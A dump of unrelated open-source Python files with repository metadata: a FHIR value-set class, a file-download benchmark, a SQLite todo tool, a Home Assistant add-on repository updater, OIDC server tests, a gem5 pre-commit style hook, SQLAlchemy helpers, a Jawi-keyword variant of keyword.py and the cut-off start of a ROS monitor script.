|
imranq2/SparkAutoMapper.FHIR
|
dd23b218fb0097d1edc2f3e688e8d6d4d7278bd2
|
[
"Apache-2.0"
] | 1
|
2020-10-31T23:25:07.000Z
|
2020-10-31T23:25:07.000Z
|
spark_auto_mapper_fhir/value_sets/v2_0372.py
|
icanbwell/SparkAutoMapper.FHIR
|
98f368e781b46523142c7cb513c670d659a93c9b
|
[
"Apache-2.0"
] | null | null | null |
spark_auto_mapper_fhir/value_sets/v2_0372.py
|
icanbwell/SparkAutoMapper.FHIR
|
98f368e781b46523142c7cb513c670d659a93c9b
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import annotations
from spark_auto_mapper_fhir.fhir_types.uri import FhirUri
from spark_auto_mapper_fhir.value_sets.generic_type import GenericTypeCode
from spark_auto_mapper.type_definitions.defined_types import AutoMapperTextInputType
# This file is auto-generated by generate_classes so do not edit manually
# noinspection PyPep8Naming
class V2_0372(GenericTypeCode):
"""
v2.0372
From: http://terminology.hl7.org/ValueSet/v2-0372 in v2-tables.xml
FHIR Value set/code system definition for HL7 v2 table 0372 ( Specimen
component)
"""
def __init__(self, value: AutoMapperTextInputType):
super().__init__(value=value)
"""
http://terminology.hl7.org/ValueSet/v2-0372
"""
codeset: FhirUri = "http://terminology.hl7.org/ValueSet/v2-0372"
| 31.269231
| 84
| 0.757688
|
4a18d8883b8324a5375ec84ac49970584c01ce45
| 4,659
|
py
|
Python
|
download_bench.py
|
itamaro/download-files-benchmark
|
806c309be987f069e98aa8d8978616cf5a522280
|
[
"MIT"
] | null | null | null |
download_bench.py
|
itamaro/download-files-benchmark
|
806c309be987f069e98aa8d8978616cf5a522280
|
[
"MIT"
] | null | null | null |
download_bench.py
|
itamaro/download-files-benchmark
|
806c309be987f069e98aa8d8978616cf5a522280
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright 2018 Itamar Ostricher
"""Benchmark and compare different ways to download files in Python"""
import base64
from concurrent.futures import ThreadPoolExecutor
from functools import wraps
import hashlib
import itertools
import os
import shutil
import subprocess
import tempfile
from time import time
import humanize
import requests
FILES = [
{
'name': 'LC80440342016259LGN00_BQA.TIF',
'url': 'https://storage.googleapis.com/gcp-public-data-landsat/LC08/PRE/044/034/LC80440342016259LGN00/LC80440342016259LGN00_BQA.TIF',
'md5': b'zqigvl5Envmi/GLc8yH51A==', # base64
'size': '3.2MB',
},
{
'name': 'LC80440342016259LGN00_B1.TIF',
'url': 'https://storage.googleapis.com/gcp-public-data-landsat/LC08/PRE/044/034/LC80440342016259LGN00/LC80440342016259LGN00_B1.TIF',
'md5': b'835L6B5frB0zCB6s22r2Sw==', # base64
'size': '71.26MB',
},
{
'name': 'LC80440342016259LGN00_B8.TIF',
'url': 'https://storage.googleapis.com/gcp-public-data-landsat/LC08/PRE/044/034/LC80440342016259LGN00/LC80440342016259LGN00_B8.TIF',
'md5': b'y795LrUzBwk2tL6PM01cEA==', # base64
'size': '304.12MB',
},
]
DOWNLOAD_FUNCTIONS = []
def bench(download_func):
"""A decorator for benchmarked download functions.
Registers the function in the global list of function to benchmark,
and computes total download time that is returned as the result.
"""
@wraps(download_func)
def wrapper(*args, **kwargs):
start = time()
download_func(*args, **kwargs)
end = time()
return end - start
DOWNLOAD_FUNCTIONS.append(wrapper)
return wrapper
def calc_md5(fname):
"""Return the base64 encoding of the MD5 hash of the file fname."""
with open(fname, 'rb') as fp:
md5hash = hashlib.md5()
# read in chunks of 1MB
for chunk in iter(lambda: fp.read(1024 * 1024), b''):
md5hash.update(chunk)
return base64.b64encode(md5hash.digest())
def file_size(fname):
"""Return file size (in bytes) of file fname"""
with open(fname, 'rb') as fp:
return fp.seek(0, 2)
def bench_download(file_desc, download_func):
"""Benchmark a download function"""
fp = tempfile.NamedTemporaryFile(delete=False)
fp.close()
try:
# time a download of file_desc using download_func
total_time = download_func(file_desc['url'], fp.name)
# compute MD5 to verify correctness
md5 = calc_md5(fp.name)
if md5 != file_desc['md5']:
print(f'Error in benchmark of {download_func.__name__} using '
f'file desc {file_desc["name"]} ({file_desc["size"]}): '
f'MD5 mismatch ({md5} != {file_desc["md5"]})')
else:
total_bytes = file_size(fp.name)
speed = total_bytes / total_time
print(f'{download_func.__name__: <22}'
f'{total_time: >6.2f} sec'
f'{humanize.naturalsize(total_bytes): >10}'
f'{humanize.naturalsize(speed): >10}/s')
finally:
os.unlink(fp.name)
@bench
def requests_raw_shutil(url, fname):
"""Download url into fname using requests raw with shutil copyfileobj"""
with requests.get(url, stream=True) as response:
with open(fname, 'wb') as fp:
shutil.copyfileobj(response.raw, fp)
@bench
def requests_chunks(url, fname):
"""Download url into fname using requests chunked content iterator"""
with requests.get(url, stream=True) as response:
with open(fname, 'wb') as fp:
for chunk in response.iter_content(chunk_size=128 * 1024):
fp.write(chunk)
@bench
def wget_subprocess(url, fname):
"""Download url into fname using wget in a subprocess"""
subprocess.check_call(['wget', '-q', '-O', fname, url])
@bench
def curl_subprocess(url, fname):
"""Download url into fname using curl in a subprocess"""
subprocess.check_call(['curl', '-s', '-o', fname, url])
def run_download_bench():
"""Run the download benchmarking over all registered functions and files"""
print('=== Benchmark download in main thread ===')
list(map(lambda args: bench_download(*args),
itertools.product(FILES, DOWNLOAD_FUNCTIONS)))
print('=== Benchmark download in a single worker thread pool ===')
with ThreadPoolExecutor(max_workers=1) as executor:
list(executor.map(lambda args: bench_download(*args),
itertools.product(FILES, DOWNLOAD_FUNCTIONS)))
if __name__ == '__main__':
run_download_bench()
| 31.47973
| 141
| 0.647135
|
4a18d96c209b4d06a0ebb1cf440df9c86ff719c6
| 2,960
|
py
|
Python
|
rogue/api/todo/controler.py
|
4383/rogue
|
faafec989145c301459e87c67af6c4728950fb3c
|
[
"MIT"
] | null | null | null |
rogue/api/todo/controler.py
|
4383/rogue
|
faafec989145c301459e87c67af6c4728950fb3c
|
[
"MIT"
] | null | null | null |
rogue/api/todo/controler.py
|
4383/rogue
|
faafec989145c301459e87c67af6c4728950fb3c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sqlite3
BASE_PATH = os.path.dirname(__file__)
USER_PATH = os.path.expanduser('~')
TODO_PATH = os.path.join(USER_PATH, '.rogue')
DATABASE_PATH = os.path.join(TODO_PATH, 'todo.db')
def sort(tasks):
sorted_tasks = {
'hight': [],
'low': [],
'normal': []
}
for el in tasks:
priority = humanize(el[5])
sorted_tasks[priority].append(el)
return sorted_tasks
def convert_for_database(priority):
binding = {'hight': 'H', 'low': 'L', 'normal': 'N'}
return binding[priority]
def humanize(priority):
binding = {'H': 'hight', 'L': 'low', 'N': 'normal'}
return binding[priority]
class Todo():
connection = None
cursor = None
def __init__(self):
if not self.__can_store():
self.__connect()
self.__initialize()
else:
self.__connect()
def __del__(self):
self.__disconnect()
def __connect(self):
self.connection = sqlite3.connect(DATABASE_PATH)
self.cursor = self.connection.cursor()
def __disconnect(self):
self.connection.close()
def __can_store(self):
if not os.path.isfile(DATABASE_PATH):
return False
return True
def __initialize(self):
if not os.path.isdir(TODO_PATH):
os.makedirs(TODO_PATH)
self.cursor.execute('''
CREATE TABLE tasks
(
id INTEGER PRIMARY KEY AUTOINCREMENT,
content TEXT,
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
finished_at DATETIME,
active BOOLEAN DEFAULT 1 CHECK (active IN (0, 1)),
priority TEXT DEFAULT 'N' CHECK (priority IN ('H', 'L', 'N'))
)
''')
self.connection.commit()
def add(self, task, priority):
self.cursor.execute('''
INSERT INTO tasks (content, priority) VALUES (?, ?)
'''
, [task, convert_for_database(priority)])
self.connection.commit()
def ls(self, active=False):
return self.cursor.execute('''
SELECT * FROM tasks
''')
def info(self, identifier):
request = '''
SELECT * FROM tasks WHERE id IN (?)
'''
return self.cursor.execute(request, [identifier])
def infos(self, identifiers):
request = '''
SELECT * FROM tasks WHERE id IN ({})
'''.format(','.join(['?']*len(identifiers)))
return self.cursor.execute(request, identifiers)
def done(self, identifier):
self.cursor.execute('''
UPDATE tasks SET
active = 0
WHERE id=?
''', [identifier])
self.connection.commit()
def delete(self, identifier):
self.cursor.execute('''
DELETE FROM tasks
WHERE id=?
''', [identifier])
self.connection.commit()
| 25.084746
| 77
| 0.55
|
4a18da132aa50c2da33de370ab7e129187312262
| 1,824
|
py
|
Python
|
repositoryupdater/cli.py
|
marciogranzotto/repository-updater
|
f703142f84659e4d478a6fd6d569788c9fb5dbbf
|
[
"MIT"
] | 9
|
2018-05-02T10:10:42.000Z
|
2022-03-30T06:09:57.000Z
|
repositoryupdater/cli.py
|
marciogranzotto/repository-updater
|
f703142f84659e4d478a6fd6d569788c9fb5dbbf
|
[
"MIT"
] | 11
|
2018-06-07T19:47:32.000Z
|
2022-02-04T19:10:09.000Z
|
repositoryupdater/cli.py
|
marciogranzotto/repository-updater
|
f703142f84659e4d478a6fd6d569788c9fb5dbbf
|
[
"MIT"
] | 6
|
2020-01-27T13:14:40.000Z
|
2022-03-30T06:11:28.000Z
|
"""
CLI Module.
Handles CLI for the Repository Updater
"""
from os import environ
from sys import argv
import click
import crayons
from . import APP_FULL_NAME, APP_VERSION
from .github import GitHub
from .repository import Repository
@click.command()
@click.option(
"--token",
hide_input=True,
prompt="GitHub access token",
help="GitHub access token",
metavar="<TOKEN>",
)
@click.option(
"--repository",
prompt="Home Assistant Addons repository to update",
help="The Home Assistant Addons repository to update",
metavar="<orgname/reponame>",
)
@click.option("--addon", help="Update a single/specific add-on", metavar="<TARGET>")
@click.option("--force", is_flag=True, help="Force an update of the add-on repository")
@click.version_option(APP_VERSION, prog_name=APP_FULL_NAME)
def repository_updater(token, repository, addon, force):
"""Community Home Assistant Add-ons Repository Updater."""
click.echo(crayons.blue(APP_FULL_NAME, bold=True))
click.echo(crayons.blue("-" * 51, bold=True))
github = GitHub(token)
click.echo(
"Authenticated with GitHub as %s"
% crayons.yellow(github.get_user().name, bold=True)
)
repository = Repository(github, repository, addon, force)
repository.update()
repository.cleanup()
def git_askpass():
"""
Git credentials helper.
Short & sweet script for use with git clone and fetch credentials.
Requires GIT_USERNAME and GIT_PASSWORD environment variables,
intended to be called by Git via GIT_ASKPASS.
"""
if argv[1] == "Username for 'https://github.com': ":
print(environ["GIT_USERNAME"])
exit()
if argv[1] == "Password for 'https://" "%(GIT_USERNAME)s@github.com': " % environ:
print(environ["GIT_PASSWORD"])
exit()
exit(1)
| 28.061538
| 87
| 0.683662
|
4a18da16656d7a48a3b6ef26f46bf3f12049d339
| 8,044
|
py
|
Python
|
tests/test_server_16_endpoint_context.py
|
IdentityPython/idpy-oidc
|
44f78f5f70d0c5ddc0108fa9a241c460179b53a8
|
[
"Apache-2.0"
] | 1
|
2022-03-24T23:39:22.000Z
|
2022-03-24T23:39:22.000Z
|
tests/test_server_16_endpoint_context.py
|
IdentityPython/idpy-oidc
|
44f78f5f70d0c5ddc0108fa9a241c460179b53a8
|
[
"Apache-2.0"
] | null | null | null |
tests/test_server_16_endpoint_context.py
|
IdentityPython/idpy-oidc
|
44f78f5f70d0c5ddc0108fa9a241c460179b53a8
|
[
"Apache-2.0"
] | null | null | null |
import copy
import os
import pytest
from cryptojwt.key_jar import build_keyjar
from idpyoidc.server import OPConfiguration
from idpyoidc.server import Server
from idpyoidc.server import do_endpoints
from idpyoidc.server.endpoint import Endpoint
from idpyoidc.server.endpoint_context import EndpointContext
from idpyoidc.server.endpoint_context import get_provider_capabilities
from idpyoidc.server.exception import OidcEndpointError
from idpyoidc.server.session.manager import create_session_manager
from idpyoidc.server.user_authn.authn_context import INTERNETPROTOCOLPASSWORD
from idpyoidc.server.util import allow_refresh_token
from . import CRYPT_CONFIG
from . import SESSION_PARAMS
from . import full_path
KEYDEFS = [
{"type": "RSA", "key": "", "use": ["sig"]},
{"type": "EC", "crv": "P-256", "use": ["sig"]},
]
KEYJAR = build_keyjar(KEYDEFS)
class Endpoint_1(Endpoint):
name = "userinfo"
default_capabilities = {
"claim_types_supported": ["normal", "aggregated", "distributed"],
"userinfo_signing_alg_values_supported": None,
"userinfo_encryption_alg_values_supported": None,
"userinfo_encryption_enc_values_supported": None,
"client_authn_method": ["bearer_header", "bearer_body"],
}
conf = {
"issuer": "https://example.com/",
"template_dir": "template",
"keys": {"uri_path": "static/jwks.json", "key_defs": KEYDEFS, "read_only": True},
"capabilities": {
"subject_types_supported": ["public", "pairwise"],
"grant_types_supported": [
"authorization_code",
"implicit",
"urn:ietf:params:oauth:grant-type:jwt-bearer",
"refresh_token",
],
},
"endpoint": {
"userinfo": {
"path": "userinfo",
"class": Endpoint_1,
"kwargs": {
"client_authn_method": [
"private_key_jwt",
"client_secret_jwt",
"client_secret_post",
"client_secret_basic",
]
},
}
},
"token_handler_args": {
"jwks_def": {
"private_path": "private/token_jwks.json",
"read_only": False,
"key_defs": [{"type": "oct", "bytes": "24", "use": ["enc"], "kid": "code"}],
},
"code": {"lifetime": 600, "kwargs": {"crypt_conf": CRYPT_CONFIG}},
"token": {
"class": "idpyoidc.server.token.jwt_token.JWTToken",
"kwargs": {
"lifetime": 3600,
"add_claims_by_scope": True,
"aud": ["https://example.org/appl"],
},
},
"refresh": {
"class": "idpyoidc.server.token.jwt_token.JWTToken",
"kwargs": {
"lifetime": 3600,
"aud": ["https://example.org/appl"],
},
},
"id_token": {"class": "idpyoidc.server.token.id_token.IDToken", "kwargs": {}},
},
"userinfo": {
"class": "idpyoidc.server.user_info.UserInfo",
"kwargs": {"db_file": full_path("users.json")},
},
"claims_interface": {"class": "idpyoidc.server.session.claims.ClaimsInterface", "kwargs": {}},
"session_params": SESSION_PARAMS,
}
class TestEndpointContext:
@pytest.fixture(autouse=True)
def create_endpoint_context(self):
self.endpoint_context = EndpointContext(
conf=conf,
server_get=self.server_get,
keyjar=KEYJAR,
)
def server_get(self, *args):
if args[0] == "endpoint_context":
return self.endpoint_context
def test(self):
endpoint = do_endpoints(conf, self.server_get)
_cap = get_provider_capabilities(conf, endpoint)
pi = self.endpoint_context.create_providerinfo(_cap)
assert set(pi.keys()) == {
"claims_supported",
"issuer",
"version",
"scopes_supported",
"subject_types_supported",
"grant_types_supported",
}
def test_allow_refresh_token(self):
self.endpoint_context.session_manager = create_session_manager(
self.server_get,
self.endpoint_context.th_args,
sub_func=self.endpoint_context._sub_func,
conf=conf,
)
assert allow_refresh_token(self.endpoint_context)
# Have the software but is not expected to use it.
self.endpoint_context.conf["capabilities"]["grant_types_supported"] = [
"authorization_code",
"implicit",
"urn:ietf:params:oauth:grant-type:jwt-bearer",
]
assert allow_refresh_token(self.endpoint_context) is False
# Don't have the software but are expected to use it.
self.endpoint_context.conf["capabilities"]["grant_types_supported"] = [
"authorization_code",
"implicit",
"urn:ietf:params:oauth:grant-type:jwt-bearer",
"refresh_token",
]
del self.endpoint_context.session_manager.token_handler.handler["refresh_token"]
with pytest.raises(OidcEndpointError):
assert allow_refresh_token(self.endpoint_context) is False
class Tokenish(Endpoint):
default_capabilities = None
provider_info_attributes = {
"token_endpoint_auth_methods_supported": [
"client_secret_post",
"client_secret_basic",
"client_secret_jwt",
"private_key_jwt",
],
"token_endpoint_auth_signing_alg_values_supported": None,
}
auth_method_attribute = "token_endpoint_auth_methods_supported"
BASEDIR = os.path.abspath(os.path.dirname(__file__))
CONF = {
"issuer": "https://example.com/",
"httpc_params": {"verify": False, "timeout": 1},
"token_expires_in": 600,
"grant_expires_in": 300,
"refresh_token_expires_in": 86400,
"capabilities": {
"subject_types_supported": ["public", "pairwise"],
"grant_types_supported": [
"authorization_code",
"implicit",
"urn:ietf:params:oauth:grant-type:jwt-bearer",
"refresh_token",
],
},
"keys": {
"public_path": "jwks.json",
"key_defs": KEYDEFS,
"private_path": "own/jwks.json",
"uri_path": "static/jwks.json",
},
"authentication": {
"anon": {
"acr": INTERNETPROTOCOLPASSWORD,
"class": "idpyoidc.server.user_authn.user.NoAuthn",
"kwargs": {"user": "diana"},
}
},
"template_dir": "template",
}
@pytest.mark.parametrize(
"kwargs",
[
{},
{"client_authn_method": ["client_secret_jwt", "private_key_jwt"]},
{"token_endpoint_auth_methods_supported": ["client_secret_jwt", "private_key_jwt"]},
],
)
def test_provider_configuration(kwargs):
conf = copy.deepcopy(CONF)
conf["endpoint"] = {
"endpoint": {"path": "endpoint", "class": Tokenish, "kwargs": kwargs},
}
server = Server(OPConfiguration(conf=conf, base_path=BASEDIR), cwd=BASEDIR)
server.endpoint_context.cdb["client_id"] = {}
_endpoints = do_endpoints(conf, server.server_get)
_cap = get_provider_capabilities(conf, _endpoints)
pi = server.endpoint_context.create_providerinfo(_cap)
assert set(pi.keys()) == {
"version",
"acr_values_supported",
"issuer",
"jwks_uri",
"scopes_supported",
"grant_types_supported",
"claims_supported",
"subject_types_supported",
"token_endpoint_auth_methods_supported",
"token_endpoint_auth_signing_alg_values_supported",
}
if kwargs:
assert pi["token_endpoint_auth_methods_supported"] == [
"client_secret_jwt",
"private_key_jwt",
]
else:
assert pi["token_endpoint_auth_methods_supported"] == [
"client_secret_post",
"client_secret_basic",
"client_secret_jwt",
"private_key_jwt",
]
| 32.176
| 98
| 0.602685
|
4a18db01f46f4a43c8095e773595c56eb1751ffe
| 3,432
|
py
|
Python
|
util/git-pre-commit.py
|
leonardopsantos/cmp237
|
9be2df44253fce38e25edd3a515d476feefbd675
|
[
"BSD-3-Clause"
] | null | null | null |
util/git-pre-commit.py
|
leonardopsantos/cmp237
|
9be2df44253fce38e25edd3a515d476feefbd675
|
[
"BSD-3-Clause"
] | null | null | null |
util/git-pre-commit.py
|
leonardopsantos/cmp237
|
9be2df44253fce38e25edd3a515d476feefbd675
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
#
# Copyright (c) 2016 ARM Limited
# All rights reserved
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Andreas Sandberg
import os
import sys
from style.repo import GitRepo
from style.verifiers import all_verifiers, all_regions
from style.style import StdioUI
import argparse
parser = argparse.ArgumentParser(
description="gem5 git style checker hook")
parser.add_argument("--verbose", "-v", action="store_true",
help="Produce verbose output")
args = parser.parse_args()
git = GitRepo()
opts = {}
repo_base = git.repo_base()
context = 8
ui = StdioUI()
os.chdir(repo_base)
failing_files = set()
for status, fname in git.status(filter="MA", cached=True):
if args.verbose:
print "Checking %s..." % fname
if status == "M":
regions = git.staged_regions(fname, context=context)
else:
regions = all_regions
verifiers = [ v(ui, opts, base=repo_base) for v in all_verifiers ]
for v in verifiers:
if v.check(fname, regions):
failing_files.add(fname)
if failing_files:
print >> sys.stderr
print >> sys.stderr, "Style checker failed for the following files:"
for f in failing_files:
print >> sys.stderr, "\t%s" % f
print >> sys.stderr
print >> sys.stderr, \
"Please run the style checker manually to fix the offending files.\n" \
"To check your modifications, run: util/style.py -m"
sys.exit(1)
| 38.133333
| 79
| 0.743881
|
4a18db96c5a3cce133f72d0c13eedcdf780877c6
| 3,433
|
py
|
Python
|
dbconnection/connector.py
|
FrancescoDelBuono/MASQ
|
4299f09a338209fb6f03cc7c0806f8cc01447fe0
|
[
"MIT"
] | 2
|
2020-08-06T10:54:28.000Z
|
2021-02-13T04:59:05.000Z
|
dbconnection/connector.py
|
softlab-unimore/MASQ
|
4299f09a338209fb6f03cc7c0806f8cc01447fe0
|
[
"MIT"
] | 6
|
2020-06-24T08:58:31.000Z
|
2021-09-22T19:18:03.000Z
|
dbconnection/connector.py
|
softlab-unimore/MASQ
|
4299f09a338209fb6f03cc7c0806f8cc01447fe0
|
[
"MIT"
] | null | null | null |
import logging
import pandas as pd
from sqlalchemy import create_engine, MetaData
from sqlalchemy.exc import SQLAlchemyError
import urllib
from utils.dbms_utils import DBMSUtils
def check_url_connection(url_connection):
if 'SQL Server' in url_connection:
odbc_params = urllib.parse.quote_plus(url_connection)
url_connection = f'mssql+pyodbc:///?odbc_connect={odbc_params}'
return url_connection
def get_connector(url_connection):
url_connection = check_url_connection(url_connection)
try:
engine = create_engine(url_connection)
engine.connect()
return engine
except SQLAlchemyError as e:
logging.error(e)
return None
def get_tables(url_connection):
url_connection = check_url_connection(url_connection)
try:
engine = create_engine(url_connection)
meta_data = MetaData(bind=engine)
meta_data.reflect()
tables = meta_data.tables
names = list(tables.keys())
return names
except SQLAlchemyError as e:
logging.error(e)
return None
def check_table(connector, table):
return False
def check_column(url_connection, table_name, column_name):
url_connection = check_url_connection(url_connection)
engine = create_engine(url_connection)
meta_data = MetaData(bind=engine)
meta_data.reflect()
tables = meta_data.tables
if table_name not in tables:
return False
columns = [val.key for val in tables[table_name].columns]
return column_name in columns
def get_table(url_connection, table_name):
url_connection = check_url_connection(url_connection)
try:
engine = create_engine(url_connection)
query = "select * from {}".format(table_name)
ds = pd.read_sql(query, engine)
return ds
except SQLAlchemyError as e:
logging.error(e)
return None
def get_columns(url_connection, table_name):
url_connection = check_url_connection(url_connection)
try:
# ToDo: modify query using Metadata
engine = create_engine(url_connection)
query = "select * from {}".format(table_name)
ds = pd.read_sql(query, engine)
return ds.columns.to_list()
except SQLAlchemyError as e:
logging.error(e)
return None
def execute_query(url_connection, query):
url_connection = check_url_connection(url_connection)
engine = create_engine(url_connection)
ds = pd.read_sql(query, engine)
return ds
def execute_multi_queries(url_connection, queries):
url_connection = check_url_connection(url_connection)
engine = create_engine(url_connection)
for q in queries[:-1]:
for qq in q.split(';'):
engine.execute(qq)
ds = pd.read_sql(queries[-1], engine)
return ds
def get_column(url_connection, table_name, column_name):
url_connection = check_url_connection(url_connection)
dbms = 'mysql'
if 'mssql' in url_connection:
dbms = 'sqlserver'
try:
engine = create_engine(url_connection)
with engine.connect() as connection:
res = connection.execute("select {} from {}".format(DBMSUtils.get_delimited_col(dbms, column_name),
table_name))
labels = [x[0] for x in res]
return labels
except SQLAlchemyError as e:
logging.error(e)
return None
| 28.848739
| 111
| 0.678415
|
4a18dba9e09715b562e348d15fb38ddbbb48d0a0
| 1,659
|
py
|
Python
|
pycosmosac/param/parameters.py
|
fishjojo/pycosmosac
|
9984a0ca2c9093142de60112f4c9a7fe33865946
|
[
"MIT"
] | 3
|
2020-07-28T02:07:57.000Z
|
2021-02-26T06:25:39.000Z
|
pycosmosac/param/parameters.py
|
fishjojo/pycosmosac
|
9984a0ca2c9093142de60112f4c9a7fe33865946
|
[
"MIT"
] | null | null | null |
pycosmosac/param/parameters.py
|
fishjojo/pycosmosac
|
9984a0ca2c9093142de60112f4c9a7fe33865946
|
[
"MIT"
] | null | null | null |
import json
from pycosmosac.param import data
KEYS = ["a_eff", "f_decay", "q_0", "r_0"]
class Parameters():
'''
Parameters for COSMO-SAC models.
Attributes:
parameters : dict
user input paramters
'''
def __init__(self, parameters=data.Saidi_2002):
self.parameters = None
self.load(parameters)
self.sanity_check()
def load(self, parameters):
'''
Load parameters from a dict or from a JSON file
'''
if isinstance(parameters, dict):
self.parameters = parameters
elif isinstance(parameters, str):
try:
with open(parameters, 'r') as f:
self.parameters = json.load(f)
except:
raise ValueError("JSON format expected.")
else:
raise TypeError("str or dict expected, while the input is %s." % type(parameters))
def sanity_check(self):
for key in KEYS:
if not key in self.parameters:
raise RuntimeError("parameter set has to include %s." % key)
def dump_to_string(self):
'''
Dump parameters to string
'''
s = json.dumps(self.parameters)
return s
def dump_to_json(self, name):
'''
Dump parameters to JSON file
'''
try:
with open(name,'w') as f:
json.dump(self.parameters, f)
except:
raise RuntimeError("dumping parameters to JSON file failed.")
if __name__ == "__main__":
myparam = Parameters()
print(myparam.dump_to_string())
myparam.dump_to_json('parameters.json')
| 27.65
| 94
| 0.564798
|
4a18dd399018c60ebda5f4f5cf35824c4dc41184
| 1,003
|
py
|
Python
|
tests/test_docsearch_topic.py
|
bib0x/pydocsearch
|
5724c8205dfe895b51aed4f4d3f0cbd31aeb8c3f
|
[
"Beerware"
] | null | null | null |
tests/test_docsearch_topic.py
|
bib0x/pydocsearch
|
5724c8205dfe895b51aed4f4d3f0cbd31aeb8c3f
|
[
"Beerware"
] | null | null | null |
tests/test_docsearch_topic.py
|
bib0x/pydocsearch
|
5724c8205dfe895b51aed4f4d3f0cbd31aeb8c3f
|
[
"Beerware"
] | null | null | null |
import pytest
from docsearch.docsearch import *
def test_docsearch_show_topic_without_search(cmd_opts, envpaths, capsys):
tests = {
'one_cheat': "\n".join([
"[one_cheat] description for the first cheat",
"- first cheat",
"- second cheat",
"\n"
]),
'one_link': "\n".join([
"[one_link] description of the first link",
"- https://linkone/",
"- https://linktwo/",
"\n"
]),
}
for topic, expected in tests.items():
cmd_opts['topic'] = topic
d = Docsearch(cmd_opts, envpaths)
d.execute()
captured = capsys.readouterr()
assert captured.out == expected
def test_docsearch_empty_topic(cmd_opts, envpaths, capsys):
cmd_opts['topic'] = 'empty_topic'
d = Docsearch(cmd_opts, envpaths)
d.execute()
captured = capsys.readouterr()
expected = 'No data received from YAML file.\n'
assert captured.out == expected
| 29.5
| 73
| 0.57328
|
4a18de32b457d9bba12e985b36607f9607d18f17
| 1,703
|
py
|
Python
|
Lib/keyword.py
|
jiaminglimjm/JawiPython
|
affbb34c7876498a7cc3eef2ef87d59f7cccd8b1
|
[
"0BSD"
] | null | null | null |
Lib/keyword.py
|
jiaminglimjm/JawiPython
|
affbb34c7876498a7cc3eef2ef87d59f7cccd8b1
|
[
"0BSD"
] | null | null | null |
Lib/keyword.py
|
jiaminglimjm/JawiPython
|
affbb34c7876498a7cc3eef2ef87d59f7cccd8b1
|
[
"0BSD"
] | null | null | null |
"""Keywords (from "Grammar/python.gram")
This file is automatically generated; please don't muck it up!
To update the symbols in this file, 'cd' to the top directory of
the python source tree and run:
PYTHONPATH=Tools/peg_generator python3 -m pegen.keywordgen \
Grammar/python.gram \
Grammar/Tokens \
Lib/keyword.py
Alternatively, you can run 'make regen-keyword'.
"""
__all__ = ["iskeyword", "issoftkeyword", "kwlist", "softkwlist"]
kwlist = [
'Benar',
'False',
'None',
'Palsu',
'Tiada',
'True',
'akhirnya',
'and',
'as',
'assert',
'async',
'atau',
'await',
'break',
'bukan',
'class',
'continue',
'cuba',
'dalam',
'dan',
'dari',
'def',
'del',
'dengan',
'elif',
'else',
'except',
'finally',
'for',
'from',
'fungsi',
'global',
'hapus',
'ialah',
'if',
'import',
'in',
'is',
'jika',
'jikain',
'kecuali',
'kelas',
'kembali',
'ketika',
'lain',
'lambda',
'lanjut',
'nonlocal',
'not',
'or',
'pass',
'putus',
'raise',
'return',
'sebagai',
'try',
'untuk',
'while',
'with',
'yield',
'اتاو',
'اخيرڽ',
'اونتوق',
'اياله',
'بنر',
'بوکن',
'تياد',
'جک',
'جکاءين',
'دالم',
'دان',
'دري',
'دڠن',
'سباݢاي',
'فوڠسي',
'لاءين',
'لنجوت',
'هاڤوس',
'چوبا',
'ڤلسو',
'ڤوتوس',
'کتيک',
'کلس',
'کمبالي',
'کچوالي'
]
softkwlist = [
'_',
'case',
'match'
]
iskeyword = frozenset(kwlist).__contains__
issoftkeyword = frozenset(softkwlist).__contains__
| 14.938596
| 64
| 0.48855
|
4a18de3bf9ad1220dbfa93016996c8562e2a16ae
| 4,612
|
py
|
Python
|
monitor/src/radiation_monitor_red.py
|
autonomy-and-verification-uol/ROSMonitoring
|
01256f780b4e3ec6f0520d7571558dfa01b8fd91
|
[
"MIT",
"BSD-3-Clause"
] | 11
|
2020-02-18T18:51:01.000Z
|
2022-03-16T12:18:51.000Z
|
monitor/src/radiation_monitor_red.py
|
autonomy-and-verification-uol/ROSMonitoring
|
01256f780b4e3ec6f0520d7571558dfa01b8fd91
|
[
"MIT",
"BSD-3-Clause"
] | 6
|
2020-02-03T15:34:49.000Z
|
2020-02-05T15:58:37.000Z
|
monitor/src/radiation_monitor_red.py
|
autonomy-and-verification-uol/ROSMonitoring
|
01256f780b4e3ec6f0520d7571558dfa01b8fd91
|
[
"MIT",
"BSD-3-Clause"
] | 2
|
2021-10-06T13:37:47.000Z
|
2022-03-24T16:27:15.000Z
|
#!/usr/bin/env python
import rospy
import sys
import json
import yaml
import websocket
from threading import *
from rospy_message_converter import message_converter
from monitor.msg import *
